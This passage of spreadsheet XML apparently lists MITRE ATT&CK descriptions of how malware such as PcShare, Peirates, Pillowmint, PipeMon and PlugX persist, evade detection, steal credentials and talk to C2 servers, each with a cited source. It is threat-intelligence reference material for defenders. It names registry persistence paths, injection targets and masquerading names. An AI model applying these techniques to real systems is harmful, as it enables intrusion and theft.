    <t>[Pandora](https://attack.mitre.org/software/S0664) can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can communicate over HTTP.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to gain system privileges through Windows services.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of running processes.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) can perform pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has used RSA encrypted communications with C2.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can remove its log file from disk.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has sent its public key to the C2 server over TCP.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can stop the MS SQL service at the end of the encryption process to release files locked by the service.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has the ability to gather the hostname of the victim machine.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can identify the IP and MAC addresses of the compromised host.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has created the `HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32` Registry key for persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can collect files and information from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can upload files and information from a compromised host to its C2 servers.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has deleted its files and components from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used an invalid certificate in attempt to appear legitimate.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has the ability to capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can delete its persistence mechanisms from the registry.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used a variety of Windows API functions.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has been encrypted with XOR using different 32-long Base16 strings and compressed with LZW algorithm.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can obtain a list of running processes on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [PcShare](https://attack.mitre.org/software/S1050) payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can search the registry files of a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used `rundll32.exe` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can take screen shots of a compromised machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\r\n`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can capture camera video as part of its collection process.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used HTTP for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can execute `cmd` commands on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can query the query AWS and GCP metadata APIs for secrets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can list AWS S3 buckets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can query the Kubernetes API for secrets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use `kubectl` or the Kubernetes API to run commands.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can enumerate Kubernetes pods in a given namespace.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can gain a reverse shell on a host node by mounting the Kubernetes hostPath.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can initiate a port scan against a given IP address.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) gathers Kubernetes service account tokens using a variety of techniques.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use Cron to create periodic and pre-scheduled background jobs.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_upload&lt;/code&gt; to send files to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can delete downloaded executables after running them.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use the command code &lt;code&gt;do_vslist&lt;/code&gt; to send file names, size, and status to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can remove strings from binaries.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_download&lt;/code&gt; to retrieve remote files from C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can add the executable flag to a downloaded file.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has mimicked the Cron binary to hide itself on compromised systems.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can sniff network traffic to look for packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>The [Penquin](https://attack.mitre.org/software/S0587) C2 mechanism is based on TCP and UDP packets.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has encrypted strings in the binary for obfuscation.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) installs a `TCP` and `UDP` filter on the `eth0` interface.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the file system type and disk space of a compromised host to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the IP of the compromised host to attacker controlled infrastructure.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) has the ability to automatically exfiltrate files and keylogs.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can identify specific files for exfiltration.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can download and execute remote files.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can log keystrokes on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can take screenshots on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can use HTTP to communicate with C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) has the ability to execute shell commands.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has been decompressed by included shellcode prior to being launched.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath &lt;code&gt;%APPDATA%\Intel\devmonsrv.exe&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has stored its malicious payload in the registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has been compressed and stored within a registry key. [Pillowmint](https://attack.mitre.org/software/S0517) has also obfuscated the AES key used for encryption.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has used a PowerShell script to install a shim database.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) can iterate through running processes every six seconds collecting a list of processes to capture from later.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has used shellcode which reads code stored in the registry keys &lt;code&gt;\REGISTRY\SOFTWARE\Microsoft\DRM&lt;/code&gt; using the native Windows API as well as read &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces&lt;/code&gt; as part of its C2.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) collects user files from the compromised host based on predefined file extensions.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) searches for files created within a certain timeframe and whose file extension matches a predefined list.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) steals credentials from compromised hosts. [PinchDuke](https://attack.mitre.org/software/S0048)'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [PinchDuke](https://attack.mitre.org/software/S0048) include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) gathers system configuration information.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) can be used to identify remote systems within a network.(Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can collect data from a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can decrypt received data from its C2 server by using AES.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to exfiltrate stolen victim data through its C2 channel.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can enumerate storage volumes and folder contents of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`,  and `Onedrive` to evade detection.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t xml:space="preserve"> [PingPull](https://attack.mitre.org/software/S1031) variants have the ability to communicate with C2 servers using ICMP or TCP.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use HTTPS over port 8080 for C2.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can encode C2 traffic with Base64.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can retrieve the hostname of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can retrieve the IP address of a compromised host.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to timestomp a file.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>A [PingPull](https://attack.mitre.org/software/S1031) variant can communicate with its C2 servers by using HTTPS.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) can use `cmd.exe` to run various commands as a reverse shell.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) has the ability to install itself as a service.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can decrypt password-protected executables.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can install additional modules via C2 commands.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501)'s first stage has been executed by a call to &lt;code&gt;CreateProcess&lt;/code&gt; with the decryption password in an argument. [PipeMon](https://attack.mitre.org/software/S0501) has used a call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) modules are stored encrypted on disk.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>The [PipeMon](https://attack.mitre.org/software/S0501) installer has modified the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors&lt;/code&gt; to install [PipeMon](https://attack.mitre.org/software/S0501) as a Print Processor.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can iterate over the running processes to find a suitable injection target.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) has used call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send OS version and computer name as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses DNS as its C2 protocol.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has commands to list drives on the victim machine and to list file information for a given directory.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to upload a file to the victim machine.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) establishes persistence via a Registry Run key.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>Responses from the [Pisloader](https://attack.mitre.org/software/S0124) C2 server are base32-encoded.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect victim system information, including the system name and OS version.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) has a command to collect the victim's IP address.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has the ability to use DLL search order hijacking for installation on targeted systems.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has used DLL side-loading to evade anti-virus.(Citation: FireEye Clandestine Fox Part 2)(Citation: Dell TG-3390)(Citation: Stewart 2014)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Palo Alto PlugX June 2017)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use DNS for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) uses Pastebin to store C2 addresses.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.(Citation: CIRCL PlugX March 2013)(Citation: Trend Micro DRBControl February 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate drives and find files recursively.(Citation: CIRCL PlugX March 2013)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can modify the characteristics of folders to hide them from the compromised user.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to download and execute files on the compromised machine.(Citation: CIRCL PlugX March 2013)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for capturing keystrokes per process including window titles.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)</t>
  </si>
  <si>
    <t>In one instance, [menuPass](https://attack.mitre.org/groups/G0045) added [PlugX](https://attack.mitre.org/software/S0013) as a service with a display name of "Corel Writing Tools Utility."(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has been disguised as legitimate Adobe and PotPlayer files.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to create, delete, or modify Registry keys.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process.(Citation: Lastline PlugX Analysis)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate network shares.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use raw TCP or UDP for command and control.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use API hashing and modify the names of strings to evade detection.(Citation: Trend Micro DRBControl February 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module to list the processes running on a machine.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can enumerate and query for information contained within the Windows Registry.(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
